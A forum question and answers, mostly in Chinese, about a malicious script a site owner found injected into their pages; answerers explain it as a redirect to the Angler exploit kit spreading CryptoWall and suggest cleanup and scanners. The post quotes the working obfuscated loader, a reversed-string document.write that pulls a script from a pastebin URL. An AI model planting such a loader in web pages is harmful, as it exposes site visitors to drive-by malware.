谷歌扫描仪检测到Javascript恶意软件

Javascript Malware Detected by Google Scanner

本文关键字:Javascript 恶意软件 检测 扫描仪 谷歌      更新时间:2023-09-26

我最近在我的网站上发现了以下代码

<script type=""text/javascript"">
document.write('>tpircs/<>""YWVPsGmx=i?php.war/moc.nibetsap//:ptth""=crs tpircs<'.split("""").reverse().join(""""))
</script>

这个代码的作用是什么?我是XSS的受害者吗?我的托管公司能做什么吗,比如恶意软件扫描仪等?

这是一个到漏洞利用工具包的重定向代码。。实际URL是

pastebin[.]com/raw[.]php?i=xmGsPVWY ---> trak[masked].co.in/js

请从服务器上托管的所有页面中删除此代码。

该文本被反转以形成一个pastebin链接-该pastebin处的脚本被加载并在浏览器中与其余的站点代码一起运行。

您的网站已被入侵并注入恶意javascript代码。

它使用多种重定向/编码方法,但最终会将访问者推到Angler EK(漏洞工具包),然后该工具包会尝试将CryptoWall集中在用户身上。

你可以尝试在这里扫描:

https://sitecheck.sucuri.net

http://www.unmaskparasites.com/

查找有关恶意软件的更多详细信息。

谢谢,